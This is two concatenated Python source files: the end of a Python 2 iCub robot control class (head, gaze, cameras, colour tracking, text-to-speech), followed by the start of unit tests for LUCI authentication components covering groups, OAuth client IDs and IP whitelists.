self.port_ikin_mono.open("/pyera-ikin-mono")
yarp.Network.connect("/pyera-ikin-mono", "/iKinGazeCtrl/mono:i")
except BaseException, err:
print("[ICUB][ERROR] connect To iKinGazeCtrl/mono catching error " + str(err))
return
try:
self.port_ikin_stereo = yarp.Port()
self.port_ikin_stereo.open("/pyera-ikin-stereo")
yarp.Network.connect("/pyera-ikin-stereo", "/iKinGazeCtrl/stereo:i")
except BaseException, err:
print("[ICUB][ERROR] connect To iKinGazeCtrl/stereo catching error " + str(err))
return
try:
self.port_ikin_xd = yarp.Port()
self.port_ikin_xd.open("/pyera-ikin-xd")
yarp.Network.connect("/pyera-ikin-xd", "/iKinGazeCtrl/xd:i")
except BaseException, err:
print("[ICUB][ERROR] connect To iKinGazeCtrl/xd catching error " + str(err))
return
try:
self.port_cart_leftarm = yarp.Port()
self.port_cart_leftarm.open("/pyera-cart-leftarm")
yarp.Network.connect("/pyera-cart-leftarm", "/cartesianSolver/left_arm/in")
except BaseException, err:
print("[ICUB][ERROR] connect To /cartesianSolver/left_arm/in catching error " + str(err))
return
self.rpc_client_head = yarp.RpcClient()
self.rpc_client_head.addOutput(icub_root+"/head/rpc:i")
self.rpc_client_head_ikin = yarp.RpcClient()
self.rpc_client_head_ikin.addOutput("/iKinGazeCtrl/rpc")
def close(self):
"""Close all the services
"""
self.port_left_camera.close()
self.port_right_camera.close()
self.rpc_client_head.close()
def check_connection(self):
"""Check if the internet connection is present or not
@return: True if connected, otherwise False
"""
import socket
try:
host = socket.gethostbyname("www.google.com")
socket.create_connection((host, 80), 2)
return True
except:
pass
return False
def return_left_camera_image(self, mode='RGB'):
"""Return a numpy array with the LEFT camera image
@param mode the image to return (default RGB)
RGB: Red Green Blue image
BGR: Blue Green Red (OpenCV)
GRAY: Grayscale image
"""
self.port_left_camera.read(self.yarp_image)
if(mode=='BGR'):
return cv2.cvtColor(self.img_array, cv2.COLOR_RGB2BGR)
elif(mode=='RGB'):
return self.img_array
elif(mode=='GRAY'):
return cv2.cvtColor(self.img_array, cv2.COLOR_BGR2GRAY)
else:
return self.img_array
def return_right_camera_image(self, mode='RGB'):
"""Return a numpy array with the RIGHT camera image
@param mode the image to return (default RGB)
RGB: Red Green Blue image
BGR: Blue Green Red (OpenCV)
GRAY: Grayscale image
"""
self.port_right_camera.read(self.yarp_image)
if(mode=='BGR'):
return cv2.cvtColor(self.img_array, cv2.COLOR_RGB2BGR)
elif(mode=='RGB'):
return self.img_array
elif(mode=='GRAY'):
return cv2.cvtColor(self.img_array, cv2.COLOR_BGR2GRAY)
else:
return self.img_array
def _set_pose_left_hand(self, x, y, z, ax, ay, az, theta):
""" This is a low level function which must be used carefully.
It allows setting the position and orientation of the left hand.
@param x: the x position (negative to move in front of the robot)
@param y: the y position (negative to move on the left side of the robot)
@param z: the z position (positive to move up)
@param ax: the x orientation (zero for hand touching the left lef)
@param ay: the y orientation (zero for hand touching left leg)
@param az: the z orientation (zero for hand touching the left leg)
@param theta: the angle theta
"""
bottle = yarp.Bottle()
bottle.clear()
bottle.addString('xd')
tmp0 = bottle.addList()
tmp0.addDouble(x)
tmp0.addDouble(y)
tmp0.addDouble(z)
tmp0.addDouble(ax)
tmp0.addDouble(ay)
tmp0.addDouble(az)
tmp0.addDouble(theta)
self.port_cart_leftarm.write(bottle)
#TODO: This function must be implemented for a safe object manipulation
# def move_left_hand_to_position(self, x, y, z):
# self._set_pose_left_hand(x, y, z, 0, 0, 0, 0)
def move_head_to_target_mono(self, type, u, v, z):
""" given a point in the image (mono) it moves the head
to that point.
WARNING: it requires iKinGazeCtrl to run.
@param type: left or right image (string)
@param u: the x coordinate of the point
@param v: the y coordinate of the point
@param z: the estimated depth in the eye coord frame
"""
bottle = yarp.Bottle()
bottle.clear()
bottle.addString(type)
bottle.addDouble(u)
bottle.addDouble(v)
bottle.addDouble(z)
self.port_ikin_mono.write(bottle)
def move_head_to_target_stereo(self, u_left, v_left, u_right, v_right):
""" Move the head to a point defined in the two image plane (stereo)
@param u_left: x coord in the left image
@param v_left: y coord in the left image
@param u_right: x coord in the right image
@param v_right: y coord in the right image
"""
bottle = yarp.Bottle()
bottle.clear()
bottle.addDouble(u_left)
bottle.addDouble(v_left)
bottle.addDouble(u_right)
bottle.addDouble(v_right)
self.port_ikin_stereo.write(bottle)
def move_head_to_point(self, x, y, z):
""" Given a point in the space it moves the head
in the direction of the point.
@param x: the x coord of the point
@param y: the y coord of the point
@param z: the z coord of the point
"""
bottle = yarp.Bottle()
bottle.clear()
bottle.addDouble(x)
bottle.addDouble(y)
bottle.addDouble(z)
self.port_ikin_xd.write(bottle)
def _move_head_random(self, delay=1.0):
t = threading.currentThread()
while getattr(t, "do_run", True):
roll = 0
pitch = random.randint(a=-30, b=+30)
yaw = random.randint(a=-20, b=+20)
bottle = yarp.Bottle()
result = yarp.Bottle()
# Set ROLL
bottle.clear()
bottle.addString("set")
bottle.addString("pos")
bottle.addInt(1) # Joint
bottle.addInt(roll) # Angle
self.rpc_client_head.write(bottle, result) # Send
# Set PITCH
bottle.clear()
bottle.addString("set")
bottle.addString("pos")
bottle.addInt(0) # Joint
bottle.addInt(pitch) # Angle
self.rpc_client_head.write(bottle, result) # Send
# Set YAW
bottle.clear()
bottle.addString("set")
bottle.addString("pos")
bottle.addInt(2) # Joint
bottle.addInt(yaw) # Angle
self.rpc_client_head.write(bottle, result) # Send
time.sleep(delay)
def _track_movement(self, template_path, delay=0.5):
""" Given a colour template it tracks the
@param delay:
@return:
"""
my_mask_analyser = BinaryMaskAnalyser()
t = threading.currentThread()
template = cv2.imread(template_path) # Load the image
my_back_detector = BackProjectionColorDetector() # Defining the deepgaze color detector object
my_back_detector.setTemplate(template) # Set the template
#cv2.namedWindow('filtered')
while getattr(t, "do_run", True):
#img_array = np.zeros((360,240,3), dtype=np.uint8)
img_array = self.return_left_camera_image(mode='BGR')
image_filtered = my_back_detector.returnFiltered(img_array, morph_opening=True,
blur=True, kernel_size=7, iterations=2)
cx, cy = my_mask_analyser.returnMaxAreaCenter(image_filtered)
if cx is not None:
cv2.circle(image_filtered,(cx,cy), 5, (0, 0, 255), -1)
bottle = yarp.Bottle()
bottle.clear()
bottle.addString('left')
bottle.addDouble(cx)
bottle.addDouble(cy)
bottle.addDouble(1.0)
self.port_ikin_mono.write(bottle)
#images_stack = np.hstack((img_array, image_filtered))
#cv2.imshow('filtered', images_stack)
#cv2.waitKey(100) #waiting 50 msec
time.sleep(0.1)
#cv2.destroyWindow('filtered')
def start_movement_detection(self, template_path, delay=1.0):
try:
if not self.thread_movement_detection.isAlive():
self.thread_movement_detection = threading.Thread(target=self._track_movement,
args=(template_path, 0.5,))
self.thread_movement_detection.start()
print "[ICUB] Head control thread started!"
except:
print "[ICUB][ERROR] unable to start head control thread"
def stop_movement_detection(self):
try:
if self.thread_movement_detection.isAlive():
self.thread_movement_detection.do_run = False
self.thread_movement_detection.join()
self.reset_head_pose() # reset the head
print "[ICUB] Head control thread stopped!"
except:
print "[ICUB][ERROR] unable to stop head control thread. Is it running?"
def is_movement_detection(self):
"""Check if the movement tracking is active
@return: return True if the movement tracking is active
"""
return self.thread_movement_detection.isAlive()
def set_head_pose(self, roll, pitch, yaw):
"""It sets the icub head using the RPC port
HEAD axes: 0=Pitch, 1=Roll, 2=Yaw
@param roll (degree) int
@param pitch (degree) int
@param yaw (degree) int
"""
bottle = yarp.Bottle()
result = yarp.Bottle()
return_tuple = [False, False, False]
#Set ROLL
bottle.clear()
bottle.addString("set")
bottle.addString("pos")
bottle.addInt(1) #Joint
bottle.addInt(roll) #Angle
self.rpc_client_head.write(bottle, result) #Send
if result == "[OK]":
return_tuple[0] = True
else:
return_tuple[0] = False
# Set PITCH
bottle.clear()
bottle.addString("set")
bottle.addString("pos")
bottle.addInt(0) # Joint
bottle.addInt(pitch) # Angle
self.rpc_client_head.write(bottle, result) # Send
if result == "[OK]":
return_tuple[1] = True
else:
return_tuple[1] = False
# Set YAW
bottle.clear()
bottle.addString("set")
bottle.addString("pos")
bottle.addInt(2) # Joint
bottle.addInt(yaw) # Angle
self.rpc_client_head.write(bottle, result) # Send
if result == "[OK]":
return_tuple[2] = True
else:
return_tuple[2] = False
def reset_head_pose(self):
"""Reset the eyes and head position to 0,0,0
"""
bottle = yarp.Bottle()
result = yarp.Bottle()
#Set ROLL
bottle.clear()
bottle.addString("set")
bottle.addString("pos")
bottle.addInt(1) #Joint
bottle.addInt(0) #Angle
self.rpc_client_head.write(bottle, result) #Send
# Set PITCH
bottle.clear()
bottle.addString("set")
bottle.addString("pos")
bottle.addInt(0) # Joint
bottle.addInt(0) # Angle
self.rpc_client_head.write(bottle, result) # Send
# Set YAW
bottle.clear()
bottle.addString("set")
bottle.addString("pos")
bottle.addInt(2) # Joint
bottle.addInt(0) # Angle
self.rpc_client_head.write(bottle, result) # Send
# Set EYE-YAW
bottle.clear()
bottle.addString("set")
bottle.addString("pos")
bottle.addInt(3) # Joint
bottle.addInt(0) # Angle
self.rpc_client_head.write(bottle, result) # Send
# Set EYE-PITCH
bottle.clear()
bottle.addString("set")
bottle.addString("pos")
bottle.addInt(4) # Joint
bottle.addInt(0) # Angle
self.rpc_client_head.write(bottle, result) # Send
def get_3d_mono_angles(self, type, u, v, z):
""" returns the 3D point whose projected pixel coordinates (u,v)
in the image plane <type> ["left"|"right"] along with third
component <z> in the eye's reference frame are given.
It requires iKinGaze to run. In the simulator mode should
be activated with: ./iKinGazeCtrl --from configSim.ini
WARNING: has been hard to find the way for adding a list
in a bottle, the icub documentation should be improved.
The trick is: tmp_var = bottle.addList()
@param type: 'let' or 'right' camera
@param u: pixel coordinate x
@param v: pixel coordinate y
@param z: third component point in front of the robot (eye reference frame)
@return: the 3D point (x,y,z) coordinates
"""
bottle = yarp.Bottle()
result = yarp.Bottle()
bottle.clear()
bottle.addString('get')
bottle.addString('3D')
bottle.addString('mono')
tmp0 = bottle.addList()
tmp0.addString('left')
tmp0.addInt(35)
tmp0.addInt(35)
tmp0.addInt(35)
self.rpc_client_head_ikin.write(bottle, result)
list_bottle = result.get(1).asList()
list_return = []
for i in range(list_bottle.size()):
list_return.append(list_bottle.get(i).asDouble())
return list_return
def get_3d_stereo_angles(self, u_left, v_left, u_right, v_right):
""" returns the 3D point whose projected pixel coordinates (u,v)
in the image plane <type> ["left"|"right"] along with third
component <z> in the eye's reference frame are given.
It requires iKinGaze to run. In the simulator mode should
be activated with: ./iKinGazeCtrl --from configSim.ini
WARNING: has been hard to find the way for adding a list
in a bottle, the icub documentation should be improved.
The trick is: tmp_var = bottle.addList()
@param type: 'let' or 'right' camera
@param u: pixel coordinate x
@param v: pixel coordinate y
@return: the 3D point (x,y,z) coordinates
"""
bottle = yarp.Bottle()
result = yarp.Bottle()
bottle.clear()
bottle.addString('get')
bottle.addString('3D')
bottle.addString('stereo')
tmp0 = bottle.addList()
tmp0.addInt(u_left)
tmp0.addInt(v_left)
tmp0.addInt(u_right)
tmp0.addInt(v_right)
self.rpc_client_head_ikin.write(bottle, result)
list_bottle = result.get(1).asList()
list_return = []
for i in range(list_bottle.size()):
list_return.append(list_bottle.get(i).asDouble())
return list_return
def set_acapela_credential(self, csv_path):
'''Load the ACAPELA config parameters
The first line of the CSV must contain:
account_login, application_login,
application_password, service_url.
@param csv_path the path to the config file
'''
with open(csv_path, 'rb') as csvfile:
reader = csv.reader(csvfile, delimiter=',')
for row in reader:
self.acapela_account_login = row[0]
self.acapela_application_login = row[1]
self.acapela_application_password = row[2]
self.acapela_service_url = row[3]
def get_acapela_credential(self):
'''Return the ACAPELA config parameters
'''
return self.acapela_account_login, self.acapela_application_login, \
self.acapela_application_password, self.acapela_service_url
def say_something(self, text, directory='/tmp/', in_background=True):
"""It says something using ACAPELA tts
@param text the string to say
@param in_background run the process in background
"""
print("[ICUB][ACAPELA] Downloading the mp3 file...")
tts_acapela = acapela.Acapela(self.acapela_account_login, self.acapela_application_login,
self.acapela_application_password, self.acapela_service_url,
quality='22k', directory=directory)
tts_acapela.prepare(text=text, lang='US', gender='M', intonation='NORMAL')
output_filename = tts_acapela.run()
print "[ICUB][ACAPELA] Recorded TTS to %s" % output_filename
subprocess.Popen(["play","-q",directory + str(output_filename)])
print "[ICUB][PLAY] reproducing the acapela file"
def learn_object_from_histogram(self, template, name):
"""Using the deepgaze histogram classifier to save an object.
@param template: the image template to store
@param name: the name of the model (must be a unique ID)
"""
self.histogram_classifier.addModelHistogram(template, name)
def remove_object_from_histogram(self, name):
"""Given an object remove it from the list
@param name: the name of the object.
@return: True if the object has been deleted
"""
return self.histogram_classifier.removeModelHistogramByName(name)
def recall_object_from_histogram(self, template):
"""Return the name of the object with the closest similarity to the template.
@param template: the image to recall
@return: the name of the object with closest similarity
"""
if self.histogram_classifier.returnSize() == 0:
return None
else:
return self.histogram_classifier.returnBestMatchIndexName(template, method="intersection")
"""
def main():
my_cub = iCub()
#my_cub.return_left_camera_image()
#print(my_cub.get_3d_mono_angles(type='left', u=0, v=0, z=0).toString())
#print(my_cub.get_3d_mono_angles(type='left', u=0, v=0, z=0).size())
#result = my_cub.get_3d_stereo_angles(u_left=23, v_left=20, u_right=35, v_right=20)
#print(result.size())
#print (result.get(1).isList())
#print(result.get(1).get(0).asDouble())
#rint(yarpListToTuple(result.get(1).asList()))
#my_cub.move_head_to_target(type='left', u=50, v=50, z=0.5)
my_cub.reset_head_pose()
#my_cub.move_head_to_target_mono(type='left', u=0, v=0, z=0.5)
#time.sleep(2)
#my_cub.start_movement_detection()
#time.sleep(30)
#my_cub.stop_movement_detection()
my_cub._set_pose_left_hand(-0.1, -0.4, 0.0, 0, 0, 0, 0.0)
#my_cub.move_left_hand_to_position(-0.3, -0.3, 0.3)
if __name__ == "__main__":
main()
"""
|
api_test.py
|
#!/usr/bin/env vpython
# Copyright 2014 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
# Disable 'Access to a protected member', Unused argument', 'Unused variable'.
# pylint: disable=W0212,W0612,W0613
# pylint: disable=redefined-outer-name
import datetime
import sys
import threading
import unittest
from six.moves import queue
import mock
from test_support import test_env
test_env.setup_test_env()
from google.appengine.ext import ndb
from components.auth import api
from components.auth import config
from components.auth import ipaddr
from components.auth import model
from components.auth import realms
from components.auth import replication
from components.auth.proto import replication_pb2
from components.auth.proto import security_config_pb2
from components import utils
from test_support import test_case
def new_auth_db(
replication_state=None,
global_config=None,
groups=None,
ip_whitelist_assignments=None,
ip_whitelists=None,
internal_service_regexp=None,
additional_client_ids=None
):
global_config = global_config or model.AuthGlobalConfig()
global_config.security_config = security_config_blob(internal_service_regexp)
return api.AuthDB.from_entities(
replication_state=replication_state or model.AuthReplicationState(),
global_config=global_config,
groups=groups or [],
ip_whitelist_assignments=(
ip_whitelist_assignments or model.AuthIPWhitelistAssignments()),
ip_whitelists=ip_whitelists or [],
additional_client_ids=additional_client_ids or [])
def security_config_blob(regexps=None):
regexps = regexps or ['(.*-dot-)?internal\\.example\\.com']
msg = security_config_pb2.SecurityConfig(internal_service_regexp=regexps)
return msg.SerializeToString()
class AuthDBTest(test_case.TestCase):
"""Tests for AuthDB class."""
def setUp(self):
super(AuthDBTest, self).setUp()
self.mock(api.logging, 'warning', lambda *_args: None)
self.mock(api.logging, 'error', lambda *_args: None)
def test_get_group(self):
g = model.AuthGroup(
key=model.group_key('group'),
members=[
model.Identity.from_bytes('user:b@example.com'),
model.Identity.from_bytes('user:a@example.com'),
],
globs=[model.IdentityGlob.from_bytes('user:*')],
nested=['blah'],
created_by=model.Identity.from_bytes('user:x@example.com'),
created_ts=datetime.datetime(2014, 1, 2, 3, 4, 5),
modified_by=model.Identity.from_bytes('user:y@example.com'),
modified_ts=datetime.datetime(2015, 1, 2, 3, 4, 5))
db = new_auth_db(groups=[g])
# Unknown group.
self.assertIsNone(db.get_group('blah'))
# Known group.
from_cache = db.get_group('group')
self.assertEqual(from_cache.key, g.key)
# Members list is sorted.
self.assertEqual(from_cache.members, [
model.Identity.from_bytes('user:a@example.com'),
model.Identity.from_bytes('user:b@example.com'),
])
# Fields that are know to be different.
exclude = ['members', 'auth_db_rev', 'auth_db_prev_rev']
self.assertEqual(
from_cache.to_dict(exclude=exclude),
g.to_dict(exclude=exclude))
def test_is_group_member(self):
# Test identity.
joe = model.Identity(model.IDENTITY_USER, 'joe@example.com')
# Group that includes joe via glob.
with_glob = model.AuthGroup(id='WithGlob')
with_glob.globs.append(
model.IdentityGlob(model.IDENTITY_USER, '*@example.com'))
# Group that includes joe via explicit listing.
with_listing = model.AuthGroup(id='WithListing')
with_listing.members.append(joe)
# Group that includes joe via nested group.
with_nesting = model.AuthGroup(id='WithNesting')
with_nesting.nested.append('WithListing')
# Creates AuthDB with given list of groups and then runs the check.
is_member = (lambda groups, ident, group:
new_auth_db(groups=groups).is_group_member(group, ident))
# Wildcard group includes everyone (even anonymous).
self.assertTrue(is_member([], joe, '*'))
self.assertTrue(is_member([], model.Anonymous, '*'))
# An unknown group includes nobody.
self.assertFalse(is_member([], joe, 'Missing'))
self.assertFalse(is_member([], model.Anonymous, 'Missing'))
# Globs are respected.
self.assertTrue(is_member([with_glob], joe, 'WithGlob'))
self.assertFalse(is_member([with_glob], model.Anonymous, 'WithGlob'))
# Members lists are respected.
self.assertTrue(is_member([with_listing], joe, 'WithListing'))
self.assertFalse(is_member([with_listing], model.Anonymous, 'WithListing'))
# Nested groups are respected.
self.assertTrue(is_member([with_nesting, with_listing], joe, 'WithNesting'))
self.assertFalse(
is_member([with_nesting, with_listing], model.Anonymous, 'WithNesting'))
def test_list_group(self):
def list_group(groups, group, recursive):
l = new_auth_db(groups=groups).list_group(group, recursive)
return api.GroupListing(
sorted(l.members), sorted(l.globs), sorted(l.nested))
grp_1 = model.AuthGroup(id='1')
grp_1.members.extend([
model.Identity(model.IDENTITY_USER, 'a@example.com'),
model.Identity(model.IDENTITY_USER, 'b@example.com'),
])
grp_1.globs.extend([
model.IdentityGlob(model.IDENTITY_USER, '*@a.example.com'),
model.IdentityGlob(model.IDENTITY_USER, '*@b.example.com'),
])
grp_2 = model.AuthGroup(id='2')
grp_2.nested.append('1')
grp_2.members.extend([
# Specify 'b' again, even though it's in a nested group.
model.Identity(model.IDENTITY_USER, 'b@example.com'),
model.Identity(model.IDENTITY_USER, 'c@example.com'),
])
grp_2.globs.extend([
# Specify '*@b.example.com' again, even though it's in a nested group.
model.IdentityGlob(model.IDENTITY_USER, '*@b.example.com'),
model.IdentityGlob(model.IDENTITY_USER, '*@c.example.com'),
])
# Unknown group.
empty = api.GroupListing([], [], [])
self.assertEqual(empty, list_group([grp_1, grp_2], 'blah', False))
self.assertEqual(empty, list_group([grp_1, grp_2], 'blah', True))
# Non recursive.
expected = api.GroupListing(
members=[
model.Identity(model.IDENTITY_USER, 'b@example.com'),
model.Identity(model.IDENTITY_USER, 'c@example.com'),
],
globs=[
model.IdentityGlob(model.IDENTITY_USER, '*@b.example.com'),
model.IdentityGlob(model.IDENTITY_USER, '*@c.example.com'),
],
nested=['1'])
self.assertEqual(expected, list_group([grp_1, grp_2], '2', False))
# Recursive.
expected = api.GroupListing(
members=[
model.Identity(model.IDENTITY_USER, 'a@example.com'),
model.Identity(model.IDENTITY_USER, 'b@example.com'),
model.Identity(model.IDENTITY_USER, 'c@example.com'),
],
globs=[
model.IdentityGlob(model.IDENTITY_USER, '*@a.example.com'),
model.IdentityGlob(model.IDENTITY_USER, '*@b.example.com'),
model.IdentityGlob(model.IDENTITY_USER, '*@c.example.com'),
],
nested=['1'])
self.assertEqual(expected, list_group([grp_1, grp_2], '2', True))
def test_nested_groups_cycle(self):
# Groups that nest each other.
group1 = model.AuthGroup(id='Group1')
group1.nested.append('Group2')
group2 = model.AuthGroup(id='Group2')
group2.nested.append('Group1')
# Collect warnings.
warnings = []
self.mock(api.logging, 'warning', lambda msg, *_args: warnings.append(msg))
# This should not hang, but produce error message.
auth_db = new_auth_db(groups=[group1, group2])
self.assertFalse(
auth_db.is_group_member('Group1', model.Anonymous))
self.assertEqual(1, len(warnings))
self.assertTrue('Cycle in a group graph' in warnings[0])
def test_not_real_nested_group_cycle_aka_issue_251(self):
# See https://github.com/luci/luci-py/issues/251.
#
# B -> A, C -> [B, A]. When traversing C, A is seen twice, and this is fine.
group_A = model.AuthGroup(id='A')
group_B = model.AuthGroup(id='B')
group_C = model.AuthGroup(id='C')
group_B.nested = ['A']
group_C.nested = ['A', 'B']
db = new_auth_db(groups=[group_A, group_B, group_C])
# 'is_group_member' must not report 'Cycle in a group graph' warning.
warnings = []
self.mock(api.logging, 'warning', lambda msg, *_args: warnings.append(msg))
self.assertFalse(db.is_group_member('C', model.Anonymous))
self.assertFalse(warnings)
def test_is_allowed_oauth_client_id(self):
global_config = model.AuthGlobalConfig(
oauth_client_id='1',
oauth_additional_client_ids=['2', '3'])
auth_db = new_auth_db(
global_config=global_config,
additional_client_ids=['local'])
self.assertFalse(auth_db.is_allowed_oauth_client_id(None))
self.assertTrue(auth_db.is_allowed_oauth_client_id('1'))
self.assertTrue(auth_db.is_allowed_oauth_client_id('2'))
self.assertTrue(auth_db.is_allowed_oauth_client_id('3'))
self.assertTrue(auth_db.is_allowed_oauth_client_id('local'))
self.assertTrue(
auth_db.is_allowed_oauth_client_id(api.API_EXPLORER_CLIENT_ID))
self.assertFalse(auth_db.is_allowed_oauth_client_id('4'))
def test_fetch_auth_db_lazy_bootstrap(self):
# Don't exist before the call.
self.assertFalse(model.root_key().get())
# Run bootstrap.
api._lazy_bootstrap_ran = False
api.fetch_auth_db()
# Exist now.
self.assertTrue(model.root_key().get())
# Simulate datastore wipe which can happen in tests, verify fetch_auth_db
# still works. It hits slightly different code path since wiping datastore
# doesn't reset _lazy_bootstrap_ran global var.
model.root_key().delete()
api.fetch_auth_db()
def run_auth_db_fetch_test(self, setup_cb):
now = utils.utcnow()
ident = model.Identity.from_bytes('user:a@example.com')
# Client IDs callback. Disable config.ensure_configured() since it overrides
# _additional_client_ids_cb after we mock it.
self.mock(config, 'ensure_configured', lambda: None)
self.mock(api, '_additional_client_ids_cb', lambda: ['', 'cb_client_id'])
self.mock(api, 'get_web_client_id', lambda: 'web_client_id')
# Create AuthGlobalConfig.
global_config = model.AuthGlobalConfig(key=model.root_key())
global_config.oauth_client_id = '1'
global_config.oauth_client_secret = 'secret'
global_config.oauth_additional_client_ids = ['2', '3']
global_config.security_config = security_config_blob()
global_config.token_server_url = 'token_server_url'
global_config.put()
# What we expect to see in the AuthDB.
expected_groups = {}
def add_group(name, members, globs, nested, owners):
expected_groups[name] = (
frozenset(members),
tuple(model.IdentityGlob.from_bytes(g) for g in globs),
tuple(nested),
owners,
)
model.AuthGroup(
key=model.group_key(name),
members=[model.Identity.from_bytes(m) for m in members],
globs=[model.IdentityGlob.from_bytes(g) for g in globs],
nested=nested,
owners=owners,
created_ts=now,
created_by=ident,
modified_ts=now,
modified_by=ident,
).put()
# Create a bunch of groups.
add_group(
name='Group A',
members=['user:a@example.com', 'user:b@example.com'],
globs=['user:*@example.com'],
nested=['Group B', 'Group C'],
owners='Group A')
add_group(
name='Group B',
members=['user:c@example.com'],
globs=['user:*@example.com'],
nested=[],
owners='Group A')
add_group(
name='Group C',
members=[],
globs=[],
nested=[],
owners='Group C')
# And a bunch IP whitelist.
model.AuthIPWhitelistAssignments(
key=model.ip_whitelist_assignments_key(),
assignments=[
model.AuthIPWhitelistAssignments.Assignment(
identity=model.Anonymous,
ip_whitelist='some ip whitelist',
created_ts=now,
created_by=ident,
comment='comment',
),
],
).put()
model.AuthIPWhitelist(
key=model.ip_whitelist_key('some ip whitelist'),
subnets=['127.0.0.1/32'],
description='description',
created_ts=now,
created_by=ident,
modified_ts=now,
modified_by=ident,
).put()
model.AuthIPWhitelist(
key=model.ip_whitelist_key('bots'),
subnets=['127.0.0.1/32'],
description='description',
created_ts=now,
created_by=ident,
modified_ts=now,
modified_by=ident,
).put()
if setup_cb:
setup_cb()
# Verify all the stuff above ends up in the auth_db.
auth_db = api.fetch_auth_db()
# global_config and additional_client_ids_cb
self.assertEqual('token_server_url', auth_db.token_server_url)
self.assertEqual(('1', 'secret', ['2', '3']), auth_db.get_oauth_config())
self.assertTrue(auth_db.is_allowed_oauth_client_id('1'))
self.assertTrue(auth_db.is_allowed_oauth_client_id('cb_client_id'))
self.assertTrue(auth_db.is_allowed_oauth_client_id('web_client_id'))
self.assertFalse(auth_db.is_allowed_oauth_client_id(''))
# Groups.
self.assertEqual(
expected_groups,
{
name: (g.members, g.globs, g.nested, g.owners)
for name, g in auth_db._groups.items()
})
# IP whitelists and whitelist assignments.
self.assertEqual(
{model.Anonymous: 'some ip whitelist'},
auth_db._ip_whitelist_assignments)
self.assertEqual(
{'bots': ['127.0.0.1/32'], 'some ip whitelist': ['127.0.0.1/32']},
auth_db._ip_whitelists)
return auth_db
def test_fetch_auth_db_from_entities(self):
auth_db = self.run_auth_db_fetch_test(None)
self.assertEqual('from_entities', auth_db._from_what)
def test_fetch_auth_db_from_snapshot(self):
PRIMARY_ID = 'primary_id'
PRIMARY_URL = 'https://primary_url'
AUTH_DB_REV = 12345
def setup_snapshot():
# Create AuthDB snapshot entities from existing "detailed" entities in
# the datastore.
_, snap = replication.new_auth_db_snapshot()
# Switch into Replica mode, store the snapshot.
model.AuthReplicationState(
key=model.replication_state_key(),
primary_id=PRIMARY_ID,
primary_url=PRIMARY_URL,
auth_db_rev=AUTH_DB_REV,
shard_ids=replication.store_sharded_auth_db(
auth_db=replication.auth_db_snapshot_to_proto(snap),
primary_url=PRIMARY_URL,
auth_db_rev=AUTH_DB_REV,
shard_size=100,
),
).put()
auth_db = self.run_auth_db_fetch_test(setup_snapshot)
self.assertEqual('from_proto', auth_db._from_what)
self.assertEqual(PRIMARY_ID, auth_db.primary_id)
self.assertEqual(PRIMARY_URL, auth_db.primary_url)
self.assertEqual(AUTH_DB_REV, auth_db.auth_db_rev)
def test_get_secret_bootstrap(self):
# Mock AuthSecret.bootstrap to capture calls to it.
original = api.model.AuthSecret.bootstrap
calls = []
@classmethod
def mocked_bootstrap(cls, name):
calls.append(name)
result = original(name)
result.values = ['123']
return result
self.mock(api.model.AuthSecret, 'bootstrap', mocked_bootstrap)
auth_db = new_auth_db()
got = auth_db.get_secret(api.SecretKey('some_secret'))
self.assertEqual(['123'], got)
self.assertEqual(['some_secret'], calls)
def test_is_in_ip_whitelist(self):
auth_db = new_auth_db(ip_whitelists=[
model.AuthIPWhitelist(
key=model.ip_whitelist_key('l'),
subnets=['127.0.0.1', '192.168.0.0/24']),
])
test = lambda ip: auth_db.is_in_ip_whitelist('l', ipaddr.ip_from_string(ip))
self.assertTrue(test('127.0.0.1'))
self.assertTrue(test('192.168.0.0'))
self.assertTrue(test('192.168.0.9'))
self.assertTrue(test('192.168.0.255'))
self.assertFalse(test('192.168.1.0'))
self.assertFalse(test('192.1.0.0'))
@staticmethod
def make_auth_db_with_ip_whitelist():
"""AuthDB with a@example.com assigned IP whitelist '127.0.0.1/32'."""
return new_auth_db(
ip_whitelists=[
model.AuthIPWhitelist(
key=model.ip_whitelist_key('some ip whitelist'),
subnets=['127.0.0.1/32'],
),
model.AuthIPWhitelist(
key=model.ip_whitelist_key('bots'),
subnets=['192.168.1.1/32', '::1/32'],
),
],
ip_whitelist_assignments=model.AuthIPWhitelistAssignments(
assignments=[
model.AuthIPWhitelistAssignments.Assignment(
identity=model.Identity(model.IDENTITY_USER, 'a@example.com'),
ip_whitelist='some ip whitelist',)
],
),
)
def test_verify_ip_whitelisted_ok(self):
# Should not raise: IP is whitelisted.
ident = model.Identity(model.IDENTITY_USER, 'a@example.com')
self.make_auth_db_with_ip_whitelist().verify_ip_whitelisted(
ident, ipaddr.ip_from_string('127.0.0.1'))
def test_verify_ip_whitelisted_not_whitelisted(self):
with self.assertRaises(api.AuthorizationError):
self.make_auth_db_with_ip_whitelist().verify_ip_whitelisted(
model.Identity(model.IDENTITY_USER, 'a@example.com'),
ipaddr.ip_from_string('192.168.0.100'))
def test_verify_ip_whitelisted_not_assigned(self):
# Should not raise: whitelist is not required for another_user@example.com.
ident = model.Identity(model.IDENTITY_USER, 'another_user@example.com')
self.make_auth_db_with_ip_whitelist().verify_ip_whitelisted(
ident, ipaddr.ip_from_string('192.168.0.100'))
def test_verify_ip_whitelisted_missing_whitelist(self):
auth_db = new_auth_db(
ip_whitelist_assignments=model.AuthIPWhitelistAssignments(
assignments=[
model.AuthIPWhitelistAssignments.Assignment(
identity=model.Identity(model.IDENTITY_USER, 'a@example.com'),
ip_whitelist='missing ip whitelist',)
],
),
)
with self.assertRaises(api.AuthorizationError):
auth_db.verify_ip_whitelisted(
model.Identity(model.IDENTITY_USER, 'a@example.com'),
ipaddr.ip_from_string('127.0.0.1'))
def test_is_internal_domain(self):
auth_db = new_auth_db(internal_service_regexp=[
'(.*-dot-)?a-int\\.example\\.com',
'(.*-dot-)?b-int\\.example\\.com',
])
self.assertTrue(auth_db.is_internal_domain('a-int.example.com'))
self.assertTrue(auth_db.is_internal_domain('b-int.example.com'))
self.assertTrue(auth_db.is_internal_domain('z-dot-a-int.example.com'))
self.assertTrue(auth_db.is_internal_domain('z-dot-b-int.example.com'))
self.assertFalse(auth_db.is_internal_domain('int.example.com'))
self.assertFalse(auth_db.is_internal_domain('a-int.example'))
self.assertFalse(auth_db.is_internal_domain('dot-a-int.example.com'))
def mock_replication_state(auth_db_rev):
return model.AuthReplicationState(
key=model.replication_state_key(),
primary_id='primary-id',
auth_db_rev=auth_db_rev)
class TestAuthDBCache(test_case.TestCase):
"""Tests for process-global and request-local AuthDB cache."""
def setUp(self):
super(TestAuthDBCache, self).setUp()
